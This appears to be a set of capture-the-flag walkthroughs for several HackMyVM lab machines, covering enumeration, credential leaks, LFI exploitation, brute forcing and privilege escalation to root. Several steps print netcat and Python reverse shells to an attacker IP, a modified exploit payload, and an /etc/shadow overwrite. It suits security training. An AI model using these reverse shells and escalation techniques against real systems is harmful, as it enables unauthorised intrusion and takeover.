HackMyVm Bah Walkthrough

HackMyVm Bah Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Bah

Scan ports.

 ~ nmap -sV -sC -p- 192.168.56.100  -oN ports.log  
 ...
 PORT     STATE SERVICE VERSION
 80/tcp   open  http    nginx 1.18.0
 |_http-server-header: nginx/1.18.0
 |_http-title: qdPM | Login
 3306/tcp open  mysql   MySQL 5.5.5-10.5.11-MariaDB-1
 ...

Open port 80 in web browser, it shows qdPM v9.2 login panel. Google that it may leak credentials.

# Exploit Title: qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated)
 # Date: 03/08/2021
 # Exploit Author: Leon Trappett (thepcn3rd)
 # Vendor Homepage: https://qdpm.net/
 # Software Link: https://sourceforge.net/projects/qdpm/files/latest/download
 # Version: 9.2
 # Tested on: Ubuntu 20.04 Apache2 Server running PHP 7.4

 The password and connection string for the database are stored in a yml file. To access the yml file you can go to http://<website>/core/config/databases.yml file and download.

Download databases.yml, get login name and password.

```bash
~ wget http://192.168.56.100/core/config/databases.yml
~ cat databases.yml
...
username: qpmadmin
password: "<?php echo urlencode('qpmpazzw') ; ?>"


Login 3306, get a url list.

 ```bash
~ mysql -h 192.168.56.100 -p3306 -u qpmadmin -p
 ...
 +----+-------------------------+
 | id | url                     |
 +----+-------------------------+
 |  1 | http://portal.bah.hmv   |
 |  2 | http://imagine.bah.hmv  |
 |  3 | http://ssh.bah.hmv      |
 |  4 | http://dev.bah.hmv      |
 |  5 | http://party.bah.hmv    |
 |  6 | http://ass.bah.hmv      |
 |  7 | http://here.bah.hmv     |
 |  8 | http://hackme.bah.hmv   |
 |  9 | http://telnet.bah.hmv   |
 | 10 | http://console.bah.hmv  |
 | 11 | http://tmux.bah.hmv     |
 | 12 | http://dark.bah.hmv     |
 | 13 | http://terminal.bah.hmv |
 +----+-------------------------+
 13 rows in set (0.001 sec)

And a users list.

 MariaDB [hidden]> select * from users;
 +----+---------+---------------------+
 | id | user    | password            |
 +----+---------+---------------------+
 |  1 | jwick   | Ihaveafuckingpencil |
 |  2 | rocio   | Ihaveaflower        |
 |  3 | luna    | Ihavealover         |
 |  4 | ellie   | Ihaveapassword      |
 |  5 | camila  | Ihaveacar           |
 |  6 | mia     | IhaveNOTHING        |
 |  7 | noa     | Ihaveflow           |
 |  8 | nova    | Ihavevodka          |
 |  9 | violeta | Ihaveroot           |
 +----+---------+---------------------+
 9 rows in set (0.001 sec)

Make a dic with the url and enum vhost. All urls are OK, but party.bah.hmv returns the minimum size.

 ~ gobuster vhost -u bah.hmv  -w  dic                                                                    
 ===============================================================
 2021/08/22 10:38:10 Starting gobuster in VHOST enumeration mode
 ===============================================================
 Found: party.bah.hmv (Status: 200) [Size: 5216]
 Found: imagine.bah.hmv (Status: 200) [Size: 5659]
 Found: portal.bah.hmv (Status: 200) [Size: 5657]
 Found: hackme.bah.hmv (Status: 200) [Size: 5657]
 Found: telnet.bah.hmv (Status: 200) [Size: 5657]
 Found: dev.bah.hmv (Status: 200) [Size: 5651]    
 Found: ssh.bah.hmv (Status: 200) [Size: 5651]    
 Found: here.bah.hmv (Status: 200) [Size: 5653]  
 Found: ass.bah.hmv (Status: 200) [Size: 5651]    
 Found: console.bah.hmv (Status: 200) [Size: 5659]
 Found: tmux.bah.hmv (Status: 200) [Size: 5653]  
 Found: dark.bah.hmv (Status: 200) [Size: 5653]  
 Found: terminal.bah.hmv (Status: 200) [Size: 5661]

Add party.bah.hmv into /etc/hosts, and visit port 80 again, we get a shell interface. Login with the credentials from yml file.

image-20210822104716708.png

This web shell is OK, so we don't need to spawn a reverse shell.

In /home, found another user rocio, escalate to user rocio with password we get from database.

 qpmadmin@bah:/home/rocio$ su rocio
 Password:
 rocio@bah:~$ id
 uid=1000(rocio) gid=1000(rocio) groups=1000(rocio),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Check pspy. Notice an interesting command of shellinaboxd.

 2021/08/21 23:38:00 CMD: UID=107  PID=452    | /usr/bin/shellinaboxd -q --background=/var/run/shellinaboxd.pid -c /var/lib/shellinabox -p 4200 -u shellinabox -g shellinabox --user-css Black on White:+/etc/shellinabox/options-enabled/00+Bl
 ack on White.css,White On Black:-/etc/shellinabox/options-enabled/00_White On Black.css;Color Terminal:+/etc/shellinabox/options-enabled/01+Color Terminal.css,Monochrome:-/etc/shellinabox/options-enabled/01_Monochrome.css --no-beep --disa
 ble-ssl --localhost-only -s/:LOGIN -s /devel:root:root:/:/tmp/dev

From the github help of shellinabox, we can know /devel:root:root:/:/tmp/dev means if we visit http://xxxx/devel, we will run /tmp/dev as root.

So we create shell code in /tmp/dev.

 ~ echo 'nc 192.168.56.150 1234 -e /bin/bash' >/tmp/dev
 ~ chmod +x /tmp/dev

When we visit http://party.bah.hmv/devel/ from web browser, we will get reverse shell.

 ~ nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:59154.
 id
 uid=0(root) gid=0(root) groups=0(root)

HackMyVm Bunny Walkthrough

HackMyVm Bunny Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Bunny

Scan ports.

~ nmap -sV -sC -p- 192.168.56.100  -oN ports.log                
 ...
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)                                      
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan dirs.

```bash
~ gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,4
03,404,500 --wildcard -o 80.log

/upload.php (Status: 200) [Size: 27305]
/password.txt (Status: 200) [Size: 537]
/index.php (Status: 200) [Size: 25]
/config.php (Status: 200) [Size: 24691]
/phpinfo.php (Status: 200) [Size: 95622]


After checking all files, nothing interesting. Next fuzz if index.php get some params.

```bash
 ~ wfuzz -u 'http://192.168.56.100/index.php?FUZZ=/etc/passwd' --hh 25  -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000013357:   200        31 L     43 W       1508 Ch     "page"

Fuzz local files, but found nothing useful.

~ wfuzz -u 'http://192.168.56.100/index.php?page=FUZZ'  --hh 25  -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt                  
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000000001:   200        31 L     43 W       1508 Ch     "/etc/passwd"
 000000005:   200        231 L    1117 W     7249 Ch     "/etc/apache2/apache2.conf"
 000000004:   200        17 L     42 W       426 Ch      "/etc/anacrontab"
 000000015:   200        26 L     192 W      1067 Ch     "/etc/crontab"
 ...

Now we get an php file with LFI, and phpinfo file whose file_uploads is on. It's a famous vulnerability.

Download poc from https://raw.githubusercontent.com/vulhub/vulhub/master/php/inclusion/exp.py and modify payload code.

      PAYLOAD="""%s\r$                                                                                                                                    
     9 <?php file_put_contents('/tmp/g', '<?php system("nc 192.168.56.150 1234 -e /bin/bash"); ?>')?>\r""" % TAG$

Run poc, now shell has been uploaded to /tmp/g.

```bash
~ (p2) python exp.py 192.168.56.100 80 vim-0 | 0 [13:38:55]
LFI With PHPInfo()
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Getting initial offset... found [tmp_name] at 137073
Spawning worker pool (10)...
51 / 1000
Got it! Shell created in /tmp/g

Woot! \m/
Shuttin' down...


Listen to port 1234 and runs the /tmp/g through LFI.

 ```bash
~ curl 'http://192.168.56.100/index.php?page=/tmp/g'                                                    
 ────────────────────────────────────────────────────────────────────────────────────────────────────────
 ~ nc -nlvp 1234        
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:49970.
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

Next, we found user chris and a file named magic.

 www-data@bunny:/home/chris/lab$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on bunny:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User www-data may run the following commands on bunny:
     (chris) NOPASSWD: /bin/bash /home/chris/lab/magic *
 www-data@bunny:/home/chris/lab$ cat magic
 cat magic
 #/bin/bash
 $1 $2 $3 -T -TT 'sh #'
 www-data@bunny:/home/chris/lab$

Check online notes from https://gtfobins.github.io/gtfobins/zip/, we see zip can spawn a shell use the cmd in magic file.

 Shell

 It can be used to break out from restricted environments by spawning an interactive system shell.

     TF=$(mktemp -u)
     zip $TF /etc/hosts -T -TT 'sh #'
     rm $TF

Escalate to user chris.

 www-data@bunny:/home/chris/lab$ sudo -u chris /bin/bash /home/chris/lab/magic zip $(mktemp -u) /etc/hosts
 <h /home/chris/lab/magic zip $(mktemp -u) /etc/hosts
   adding: etc/hosts (deflated 30%)
 $ id
 id
 uid=1000(chris) gid=1000(chris) groups=1000(chris),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)

Create /home/chris/.ssh, upload id_rsa.pub, rename to authorized_keys, chmod 600, then we can get ssh login.

Found writable file.

```bash
chris@bunny:~$ find / -writable -not -path "/proc*" 2>/dev/null
/home/chris
...
/usr/lib/python3.7/random.py
/tmp
...


Found /opt/pendu.py which imports random.py.

 ```bash
chris@bunny:~$ cd /opt
 chris@bunny:/opt$ ls -la
 total 12
 drwxr-x---  2 root chris 4096 juil. 31 10:25 .
 drwxr-xr-x 18 root root  4096 juil. 31 09:00 ..
 -rw-r--r--  1 root root  1993 juil. 31 10:14 pendu.py
 chris@bunny:/opt$ cat pendu.py
 import random                    
 ...

Use pspy to check system calls.

 2021/08/17 06:53:01 CMD: UID=0    PID=1236   | /bin/sh -c /usr/bin/python3.7 /opt/pendu.py

Write python reverse shell code into random.py, and wait for the final root shell.

```bash
chris@bunny:~$ echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.150",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' > /usr/lib/python3.7/random.py
chris@bunny:~$
────────────────────────────────────────────────────────────────────────────────────────────────────────
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:49976.
bash: impossible de régler le groupe de processus du terminal (1259): Ioctl() inapproprié pour un périphérique
bash: pas de contrôle de tâche dans ce shell
root@bunny:~# id;hostname;
id;hostname;
uid=0(root) gid=0(root) groupes=0(root)
bunny
root@bunny:~#

HackMyVm Zen Walkthrough

HackMyVm Zen Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Zen

Scan ports.

nmap -sV -sC -p- -oN ports.log 192.168.56.100  
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 c3:a0:ac:5d:25:92:47:2c:f5:70:ba:1b:f0:a3:b9:67 (RSA)
 |   256 03:72:ad:7b:df:46:5d:b3:2a:9b:69:a9:c4:11:35:86 (ECDSA)
 |_  256 4b:a1:81:88:73:2a:a0:b6:5c:9f:30:d9:c9:7f:1f:3f (ED25519)
 80/tcp open  http    nginx 1.14.2
 | http-robots.txt: 9 disallowed entries
 | /albums/ /plugins/ /P@ssw0rd /themes/ /zp-core/
 |_/zp-data/ /page/search/ /uploaded/ /backup/
 |_http-server-header: nginx/1.14.2
 |_http-title: Galer\xC3\xADa
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel    

From main page, get the app name and version number.

```bash
~ curl http://192.168.56.99
<!DOCTYPE html>
...
</body>
</html>
<!-- zenphoto version 1.5.7 -->


Google the zenphoto version 1.5.7, we know it has upload vulnerability.
         Authenticated arbitrary file upload to RCE

Product : Zenphoto
Affected : Zenphoto CMS - <= 1.5.7
Attack Type : Remote

login then go to plugins then go to uploader and press on the check box elFinder
then press apply , after that you go to upload then Files(elFinder) drag and drop
any malicious php code after that go to /uploaded/ and you're php code


Zenphoto through 1.5.7 is affected by authenticated arbitrary file
upload, leading to remote code execution. The attacker must navigate to
the uploader plugin, check the elFinder box, and then drag and drop
files into the Files(elFinder) portion of the UI. This can, for
example, place a .php file in the server's uploaded/ directory.

[Reference]
https://www.linkedin.com/in/abdulaziz-almisfer-22a7861ab/
https://twitter.com/3almisfer
https://github.com/azizalshammari/


From robots.txt, found a strange string: P@ssw0rd.

Find the login panel of zenphoto at /zp-core/admin.php, login with admin:P@ssw0rd.

Upload a php shell and get reverse shell.

```bash
 & kali @ mykali in ~/Documents/zen 0 [13:57:14]
 ~ nc -nlvp 1234        
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.99.
 Ncat: Connection from 192.168.56.99:38120.
 Linux zen 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux
  20:23:18 up 16 min,  0 users,  load average: 0.00, 0.02, 0.04
 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 /bin/sh: 0: can't access tty; job control turned off
 $
 ────────────────────────────────────────────────────────────────────────────────────────────────────────
 & kali @ mykali in ~/Documents/zen 0 [14:05:51]
 ~ curl http://192.168.56.99/backup/r.php

Found 3 users in home folder.

www-data@zen:/home$ ls -la
 ls -la
 total 20
 drwxr-xr-x  5 root      root      4096 Jun 14 03:45 .
 drwxr-xr-x 18 root      root      4096 Jun 14 03:19 ..
 drwxr-xr-x  2 hua       hua       4096 Jun 14 03:45 hua
 drwxr-xr-x  2 kodo      kodo      4096 Jun 14 03:24 kodo
 drwxr-xr-x  3 zenmaster zenmaster 4096 Jun 14 03:47 zenmaster

Because we can found no way to escalate to anyone of these 3 users, so we can only bruteforce ssh credentials.

 ~ hydra -L names.txt -P names.txt -e nsr 192.168.56.99 ssh -t64 -F                                       ...
 [DATA] attacking ssh://192.168.56.99:22/
 [22][ssh] host: 192.168.56.99   login: zenmaster   password: zenmaster

Login as zenmaster, escalate to kodo.

```bash
enmaster@zen:~$ sudo -l
Matching Defaults entries for zenmaster on zen:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User zenmaster may run the following commands on zen:
(kodo) NOPASSWD: /bin/bash
zenmaster@zen:~$ sudo -u kodo /bin/bash -p


As user kodo, check sudo -l. Use the edit function, and press !:/bin/bash, escalate to user 

 ```bash
kodo@zen:/home/zenmaster$ sudo -l
 Matching Defaults entries for kodo on zen:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 User kodo may run the following commands on zen:
     (hua) NOPASSWD: /usr/bin/see
 kodo@zen:/home/zenmaster$ touch /tmp/tmp.txt
 kodo@zen:/home/zenmaster$ chmod 666 /tmp/tmp.txt
 kodo@zen:/home/zenmaster$ sudo -u hua /usr/bin/see --action=edit /tmp/tmp.txt
 hua@zen:/home/zenmaster$ id
 uid=1002(hua) gid=1002(hua) groups=1002(hua)

Check sudo -l.

```bash
hua@zen:/tmp$ sudo -l
Matching Defaults entries for hua on zen:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User hua may run the following commands on zen:
(ALL : ALL) NOPASSWD: /usr/sbin/add-shell zen


 We can write to /use/local/bin.

 ```bash
hua@zen:/tmp$ find / -writable -not -path '/proc*' 2>/dev/null  
 ...
 /tmp/.X11-unix
 /usr/local/bin
 /usr/lib/systemd/system/mountnfs-bootclean.service
 ...

Use strace to track add-shell, it calls awk, cat, rm from /usr/local/bin, which don't exist.

```bash
hua@zen:/tmp$ strace /usr/sbin/add-shell zen 2>&1 |grep /usr/local/bin
stat("/usr/local/bin/awk", 0x7fff52bfdc20) = -1 ENOENT (No such file or directory)
stat("/usr/local/bin/cat", 0x7fff52bfdc20) = -1 ENOENT (No such file or directory)
stat("/usr/local/bin/rm", 0x7fff52bfdb80) = -1 ENOENT (No such file or directory)
hua@zen:/tmp$ ls -la /usr/local/bin/awk
ls: cannot access '/usr/local/bin/awk': No such file or directory
hua@zen:/tmp$ ls -la /usr/local/bin/cat
ls: cannot access '/usr/local/bin/cat': No such file or directory
hua@zen:/tmp$ ls -la /usr/local/bin/rm
ls: cannot access '/usr/local/bin/rm': No such file or directory


Then we can write a shell code in awk, and get root shell.

 ```bash
hua@zen:/tmp$ echo 'nc 192.168.56.150 1234 -e /bin/bash' > /usr/local/bin/awk
 hua@zen:/tmp$ chmod +x /usr/local/bin/awk
 hua@zen:/tmp$ sudo /usr/sbin/add-shell zen
 ────────────────────────────────────────────────────────────────────────────────────────────────────────
 & kali @ mykali in ~ 0 [15:25:33]
 ~ nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.99.
 Ncat: Connection from 192.168.56.99:38124.
 id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 zen

HackMyVm Chronos Walkthrough

HackMyVm Chronos Walkthrough

The author's writeup is here:https://al1enum.github.io/docs/Chronos.pdf.

Very interesting machine.

The author use perl to get reverse shell, because the machine blocked many keywords: nc, bash, python, etc.

My way is to use wget to download a php reverse shell.

~ curl 'http://chronos.local:8000/date?format=261Bh6biKcNSb82qsJG3axmPWvBhPVZUTUzqYLXr2nGfYVHfcpNVUhTU1Z95B5dJzYt151Eki' -A 'Chronos'  
 Something went wrong

 ~ curl 'http://chronos.local:8000/date?format=H8SMnBduptVPuh8JQtH81okZXHxz74' -A 'Chronos'
 Sun Aug  8 04:05:06 UTC 2021
 total 24
 drwxr-xr-x 3 www-data www-data 4096 Aug  8 04:03 .
 drwxr-xr-x 3 root     root     4096 Jul 29 08:59 ..
 drwxr-xr-x 2 www-data www-data 4096 Jul 30 08:00 css
 -rw-r--r-- 1 www-data www-data 1887 Aug  4 07:18 index.html
 -rw-r--r-- 1 www-data www-data 5496 Aug  8 04:03 r.php

HackMyVm Noob Walkthrough

HackMyVm Noob Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Noob

Scan ports.

nmap -sV -sC -p- -oN ports.log 192.168.56.100
 Nmap scan report for secret.vinci.hmv (192.168.56.100)
 Host is up (0.0010s latency).
 Not shown: 65533 closed ports
 PORT      STATE SERVICE VERSION
 22/tcp    open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 66:6a:8e:22:cd:dd:75:52:a6:0a:46:06:bc:df:53:0f (RSA)
 |   256 c2:48:46:33:d4:fa:c0:e7:df:de:54:71:58:89:36:e8 (ECDSA)
 |_  256 5e:50:90:71:08:5a:88:62:7e:81:07:c3:9a:c1:c1:c6 (ED25519)
 65530/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
 |_http-title: Site doesn't have a title (text/plain; charset=utf-8).
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Check 65530 http.

 ~ curl http://192.168.56.100:65530
 404 page not found

Try /index.

 ~ curl http://192.168.56.100:65530/index
 Hi, You are close!

Scan dirs. Because too many fake response, we omit file extensions.

```bash
~ gobuster dir -u http://192.168.56.100:65530 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -b 401,403,404,500 --wildcard -o 65530.log
...

/index (Status: 200) [Size: 19]
/http%3A%2F%2Fwww (Status: 301) [Size: 45] [--> /http:/www]
/http%3A%2F%2Fyoutube (Status: 301) [Size: 49] [--> /http:/youtube]
/http%3A%2F%2Fblogs (Status: 301) [Size: 47] [--> /http:/blogs]
/http%3A%2F%2Fblog (Status: 301) [Size: 46] [--> /http:/blog]
/**http%3A%2F%2Fwww (Status: 301) [Size: 51] [--> /%2A%2Ahttp:/www]
/http%3A%2F%2Fcommunity (Status: 301) [Size: 51] [--> /http:/community]
/http%3A%2F%2Fradar (Status: 301) [Size: 47] [--> /http:/radar]
/http%3A%2F%2Fjeremiahgrossman (Status: 301) [Size: 58] [--> /http:/jeremiahgrossman]
/http%3A%2F%2Fweblog (Status: 301) [Size: 48] [--> /http:/weblog]
/http%3A%2F%2Fswik (Status: 301) [Size: 46] [--> /http:/swik]
/nt4share (Status: 301) [Size: 45] [--> /nt4share/]


Notice the last /nt4sare. Check it.

 ```bash
~ curl http://192.168.56.100:65530/nt4share/
 <pre>
 <a href=".Xauthority">.Xauthority</a>
 <a href=".bash_history">.bash_history</a>
 <a href=".bash_logout">.bash_logout</a>
 <a href=".bashrc">.bashrc</a>
 <a href=".profile">.profile</a>
 <a href=".ssh/">.ssh/</a>
 <a href="linpeas.sh">linpeas.sh</a>
 <a href="pspy64">pspy64</a>
 </pre>

It's a user's home folder. From .bash_history, we get an user name "adela".

~ curl ht```bash
tp://192.168.56.100:65530/nt4share/.bash_history
...
ls -la /opt
find / -user adela 2>/dev/null

 ...

From /.ssh, we download id_rsa, and login ssh as user adela.

```bash
 ~ chmod 600 id_rsa
 ~ ssh adela@192.168.56.100 -i id_rsa
 ...
 adela@noob:~$ id
 uid=1000(adela) gid=1000(adela) groups=1000(adela),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plu
 gdev),109(netdev)

The last step is tricky. Enum a lot but still can not find the way to root.

Create a symbolic link to /root/.ssh/id_rsa, then read it through http.

adela@noob:~$ ln -s /root/.ssh/id_rsa /home/adela/
 ...
 ~ curl http://192.168.56.100:65530/nt4share/id_rsa                    
 -----BEGIN OPENSSH PRIVATE KEY-----
 b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
 ...
 ZxNBqOXEOeZrCUy6ujhX4HeLih7BElkYwZEKvVbJti/I0RsdcbYGWlAPPBvi/8jZnQ7xaT
 T7Qx+xDGFV1hJakGHwAAAAlyb290QG5vb2I=
 -----END OPENSSH PRIVATE KEY-----

HackMyVm Hundred Walkthrough

HackMyVm Hundred Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Hundred

Scan open ports.

nmap -sV -sC -p- -oN ports.log 192.168.56.100
 ...
 PORT   STATE SERVICE VERSION
 21/tcp open  ftp     vsftpd 3.0.3
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 | -rwxrwxrwx    1 0        0             435 Aug 02 06:19 id_rsa [NSE: writeable]
 | -rwxrwxrwx    1 1000     1000         1679 Aug 02 06:11 id_rsa.pem [NSE: writeable]
 | -rwxrwxrwx    1 1000     1000          451 Aug 02 06:11 id_rsa.pub [NSE: writeable]
 |_-rwxrwxrwx    1 0        0             187 Aug 02 06:27 users.txt [NSE: writeable]
 | ftp-syst:
 |   STAT:
 | FTP server status:
 |      Connected to ::ffff:192.168.56.150
 |      Logged in as ftp
 |      TYPE: ASCII
 |      No session bandwidth limit
 |      Session timeout in seconds is 300
 |      Control connection is plain text
 |      Data connections will be plain text
 |      At session startup, client count was 1
 |      vsFTPd 3.0.3 - secure, fast, stable
 |_End of status
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 ef:28:1f:2a:1a:56:49:9d:77:88:4f:c4:74:56:0f:5c (RSA)
 |   256 1d:8d:a0:2e:e9:a3:2d:a1:4d:ec:07:41:75:ce:47:0e (ECDSA)
 |_  256 06:80:3b:fc:c5:f7:7d:c5:58:26:83:c4:f7:7e:a3:d9 (ED25519)
 80/tcp open  http    nginx 1.14.2
 |_http-server-header: nginx/1.14.2
 |_http-title: Site doesn't have a title (text/html).
 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Login in ftp anonymous, download all 4 files and check each one.

id_rsa is a fake key. users.txt has a name list. id_rsa.pem looks like a good rsa key.

Scan port 80, only found index.html. Check source code, there is a hint: key. And there may be a secret dir.

```bash
~ curl http://192.168.56.100/index.html
<style>
.center {
display: block;
margin-left: auto;
margin-right: auto;
key: h4ckb1tu5.enc;
width: 50%;
}
</style>

<img src="logo.jpg" class="center">
<h1>Thank you ALL!</h1>
<h1>100 f*cking VMs!!</h1>

<!-- l4nr3n, nice dir.-->


Download h4ckb1tu5.enc. Google the way to decrypt enc file. Get the dir name.

```bash
 ~ openssl rsautl -decrypt -inkey id_rsa.pem -in h4ckb1tu5.enc -out key.bin  
 ~ cat key.bin
 /softyhackb4el7dshelldredd

Scan the dir with common.txt, get id_rsa.

 ~ gobuster dir -u http://192.168.56.100/softyhackb4el7dshelldredd -t 50  -w /usr/share/dirb/wordlists/common.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ===============================================================
 /id_rsa               (Status: 200) [Size: 1876]
 /index.html           (Status: 200) [Size: 26]  
 /index.html           (Status: 200) [Size: 26]

Try to login ssh with the username in users.txt downloaded from ftp, in fact, the really username is hvm. But we still need the pass of the key file.

 ~ ssh noname@192.168.56.100 -i id_rsa    
 noname@192.168.56.100's password:

 ~ ssh hmv@192.168.56.100 -i id_rsa
 Enter passphrase for key 'id_rsa':

At root folder, we can get a logo.jpg, let's see if something is hidden in it.

 ~ stegseek --crack logo.jpg users.txt
 StegSeek version 0.5
 Progress: 0.00% (0 bytes)          

 [i] --> Found passphrase: "cromiphi"
 [i] Original filename: "toyou.txt"
 [i] Extracting to "logo.jpg.out"

 ~ cat logo.jpg.out                                                                                      
 d4t4s3c#1

Now we can login ssh as hmv.

 ~ ssh hmv@192.168.56.100 -i id_rsa                                                                                                                                                             ssh-0 | 130 [19:12:34]
 Enter passphrase for key 'id_rsa':
 Linux hundred 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

 The programs included with the Debian GNU/Linux system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.

 Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
 permitted by applicable law.
 Last login: Mon Aug  2 06:43:27 2021 from 192.168.1.51
 hmv@hundred:~$ id
 uid=1000(hmv) gid=1000(hmv) groups=1000(hmv),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Found /etc/shadow is writable.

hmv@hundred:/$ find / -writable -not -path "/proc*" 2>/dev/null
 ...
 /var/www/html/softyhackb4el7dshelldredd/id_rsa
 /etc/shadow
 ...

Create a password hash with word "mypass", and overwrite /etc/shadow. Then we can be root.

 hmv@hundred:/$ openssl passwd mypass
 J9ZxI.ncuCgxs
 hmv@hundred:/$ echo 'root:J9ZxI.ncuCgxs:18656:0:99999:7:::' > /etc/shadow
 hmv@hundred:/$ su root
 Password:
 root@hundred:/# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 hundred
 root@hundred:/# 

HackMyVm Nowords Walkthrough

HackMyVm Nowords Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Nowords

Below is main steps.

Nmap scan ports, scan port 80, found hints at index.html.

 ~ curl http://192.168.56.100/index.html        
 Hint inside.

 <!-- [usernames and passwords are lowercase] -->

Download robots.txt, it's actually an PNG file, with some strings in it.

[image-20210707134241221.png]

OCR the strings online, make a dic, and scan port 80 again, found only 1 valid files. Download it, and it's actually a JPG file with some strings.

[image-20210707134856042.png]

OCR again, lower the first char of each word, make a dic. Then brute force ftp.

~ hydra -L pass2.txt -P pass2.txt 192.168.56.100 -t 64 ftp -f                                                                                                                                   fish-0 | 0 [12:54:58]
 Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

 Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-06 12:55:22
 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
 [DATA] max 64 tasks per 1 server, overall 64 tasks, 5776 login tries (l:76/p:76), ~91 tries per task
 [DATA] attacking ftp://192.168.56.100:21/
 [21][ftp] host: 192.168.56.100   login: sophie   password: natalia
 [STATUS] attack finished for 192.168.56.100 (valid pair found)
 1 of 1 target successfully completed, 1 valid password found
 Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-07-06 12:56:28

Through the ftp, we can browse the whole machine. In /home/sophie, found command.jpg and log.txt.

In /home/me, found doit.py.

 ~ cat doit.py                                                                        fish-0 | 0 [13:50:38]
 #!/usr/bin/python3
 # coding: utf-8

 import pytesseract
 import os
 try:
     import Image, ImageOps, ImageEnhance, imread
 except ImportError:
     from PIL import Image, ImageOps, ImageEnhance

 def solve_captcha(path):
     captcha = pytesseract.image_to_string(Image.open(path))
     return captcha

 if __name__ == '__main__':
     text = solve_captcha("/home/sophie/command.jpg")
     a = text.split("\n")
     f = open("/home/sophie/log.txt","w")
     f.write(" Executing: "+text)
     f.close()
     os.system(a[0])

The script means, we need to put and bash command in command.jpg, then cron job will do OCR and run the command.

